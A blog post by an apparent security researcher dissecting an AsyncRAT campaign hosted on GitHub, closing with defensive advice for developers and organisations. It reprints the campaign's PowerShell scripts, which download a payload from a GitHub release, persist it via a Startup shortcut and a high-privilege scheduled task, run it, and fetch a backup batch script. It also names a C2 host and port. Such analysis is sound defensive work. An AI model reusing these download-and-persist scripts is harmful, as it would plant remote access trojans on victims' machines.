Previous Next
by danduran on Development , Cybersecurity 6 min read, Comments: 0 (Add Your Comment!)

Unmasking the Dark Side of GitHub - A Deep Dive into Malware Distribution

Newsletter Signup
@commentary
Unmasking the Dark Side of GitHub - A Deep Dive into Malware Distribution

GitHub is synonymous with innovation, collaboration, and open-source development. With millions of repositories and users worldwide, it has become the de facto platform for developers to share code and contribute to groundbreaking projects. However, like any powerful tool, GitHub has its vulnerabilities. As a cybersecurity professional and developer with over 25 public repositories, I’ve always viewed GitHub as a cornerstone of the open-source ecosystem. But during a recent investigation, I uncovered a disturbing reality: hackers are exploiting GitHub to host and distribute malware on an alarming scale.

This blog takes a technical and descriptive approach to dissect one such attack that uses AsyncRAT, an open-source remote access trojan. It also explores how hackers leverage GitHub for a wide array of malicious activities, offering insights and strategies for safeguarding against these threats.

The Investigation Begins: GitHub and Malware

The journey began on URLHaus, a renowned database for tracking malicious URLs. Curious to understand how GitHub was being misused, I searched for github.com on the platform. The results were shocking—thousands of URLs flagged as hosting malicious content, from phishing kits to ransomware payloads. Among these was a repository containing detailed scripts and payloads for deploying AsyncRAT, a powerful remote access trojan frequently abused by cybercriminals.

What I Found: A Technical Breakdown

The Repository’s Contents

The repository I analyzed was a goldmine for malware distribution. It contained:
1. Scripts for Payload Deployment:
- PowerShell and batch scripts for downloading, executing, and persisting malware.
2. Precompiled Binaries:
- Loader.exe: The AsyncRAT payload.
- output.exe: A grabber tool for stealing sensitive information.
3. Documentation:
- Instructions and notes explaining how to use the scripts and payloads, likely intended for less experienced attackers.

This repository didn’t just host malware—it provided a playbook for setting up and running a malicious campaign.

AsyncRAT Campaign: Dissecting the Attack Flow

AsyncRAT is an open-source remote access tool designed for legitimate use, but its feature set has made it a favorite among cybercriminals. Here’s how this particular campaign operated:

Stage 1: Initial Compromise

The first stage of the attack was not included in the repository but would typically involve:
- Phishing: Sending malicious email attachments or links to unsuspecting users.
- Exploitation: Using software vulnerabilities to execute commands on the victim's system.
- Social Engineering: Convincing users to download and execute malicious files.

The goal here is to establish the ability to execute commands on the target system, setting the stage for the next steps.

Stage 2: Deploying the RAT

Once the attacker has access, they execute scripts to download and install the AsyncRAT payload.

PowerShell Script (Loader.exe Deployment)

The PowerShell script downloads the RAT and ensures persistence.

# Define the URL and output path for the payload
$url = "https://github.com/<user>/uu/releases/download/dss/Loader.exe"
$output = "$env:USERPROFILE\Desktop\Loader.exe"
$startupFolder = "$env:APPDATA\Microsoft\Windows\Start Menu\Programs\Startup"
$shortcutPath = "$startupFolder\Loader.lnk"

# Download the payload
Invoke-WebRequest -Uri $url -OutFile $output -ErrorAction SilentlyContinue

# Create a shortcut in the Startup folder
$WScriptShell = New-Object -ComObject WScript.Shell
$shortcut = $WScriptShell.CreateShortcut($shortcutPath)
$shortcut.TargetPath = $output
$shortcut.Save()

# Register a scheduled task for persistence
$taskName = "LoaderStartup"
$action = New-ScheduledTaskAction -Execute "PowerShell.exe" -Argument "-WindowStyle Hidden -File $output"
$trigger = New-ScheduledTaskTrigger -AtLogon
$principal = New-ScheduledTaskPrincipal -UserId "BUILTIN\Users" -LogonType Interactive -RunLevel Highest
$settings = New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DontStopIfGoingOnBatteries -StartWhenAvailable
Register-ScheduledTask -TaskName $taskName -Action $action -Trigger $trigger -Principal $principal -Settings $settings -Force

# Execute the RAT
Start-Process -FilePath $output

Key Features:
1. Downloading the RAT:
- Fetches Loader.exe from GitHub using Invoke-WebRequest.
2. Persistence:
- Creates a shortcut in the Startup folder.
- Registers a Scheduled Task to ensure the RAT runs after every reboot.
3. Execution:
- Launches Loader.exe immediately.

Stage 3: Backup Script

The repository also included a secondary batch script (Loader.bat), designed to re-establish the malware if the primary payload was removed.

$url = "https://github.com/<user>/dsa/releases/download/d/Loader.bat"
$output = "$env:TEMP\Loader.bat"

# Download the backup script
Invoke-WebRequest -Uri $url -OutFile $output -ErrorAction SilentlyContinue

# Execute the script
Start-Process -FilePath $output

Purpose:
- Ensures the malware can resurface if the main payload (Loader.exe) is detected and removed.

Stage 4: AsyncRAT in Action

Once deployed, AsyncRAT provides attackers with:
- Full System Control:
- Remote desktop access.
- Command execution.
- Data Theft:
- Keylogging.
- Clipboard monitoring.
- File exfiltration.
- Persistence:
- Ability to deploy additional malware or maintain control over the system.

The RAT communicates with its C2 server (<link>ebay.gl.at.ply.gg) over port 10404.

Why GitHub?

Hackers abuse GitHub because:
1. Reputation:
- GitHub is a trusted platform, making it easier to bypass basic security measures.
2. Ease of Access:
- Attackers can deliver malware with simple commands like git clone or curl.
3. Scalability:
- Forking and cloning repositories ensure malware survives takedowns.

Technical Observations Across Repositories

During my investigation, I found GitHub-hosted repositories containing:
- DDoS Tools: Scripts and bots for launching distributed denial-of-service attacks.
- Cryptojackers: Malware designed to mine cryptocurrency on compromised systems.
- Ransomware: Open-source ransomware frameworks.
- Phishing Kits: Fake login pages for credential harvesting.

How to Protect Yourself

For Developers

  1. Inspect Code Before Execution:
  2. Always review scripts downloaded from GitHub. Watch for commands like Invoke-WebRequest or Start-Process.
  3. Verify Repositories:
  4. Check contributors, commit history, and community reviews.
  5. Sandbox Untrusted Code:
  6. Use isolated environments to test unfamiliar scripts.

For Organizations

  1. Enforce Security Policies:
  2. Restrict PowerShell usage and block unauthorized script execution.
  3. Monitor Network Activity:
  4. Look for connections to malicious C2 domains or unusual ports.
  5. Educate Employees:
  6. Train staff to recognize and avoid malicious repositories.

Conclusion: The Dark Reality of Open Source

GitHub’s open nature is a double-edged sword. While it enables incredible collaboration and innovation, it also provides a fertile ground for cybercriminals. This case study of AsyncRAT is a stark reminder of the risks inherent in downloading and running unverified code.

As cybersecurity professionals and developers, we must remain vigilant. Always question the source of the code, scrutinize its contents, and educate others about the risks of blindly trusting even the most reputable platforms. Only by adopting a proactive approach can we mitigate the growing threat of malware in the open-source ecosystem.

Latest Comments
Sign in to add a comment

No comments yet. Be the first to comment!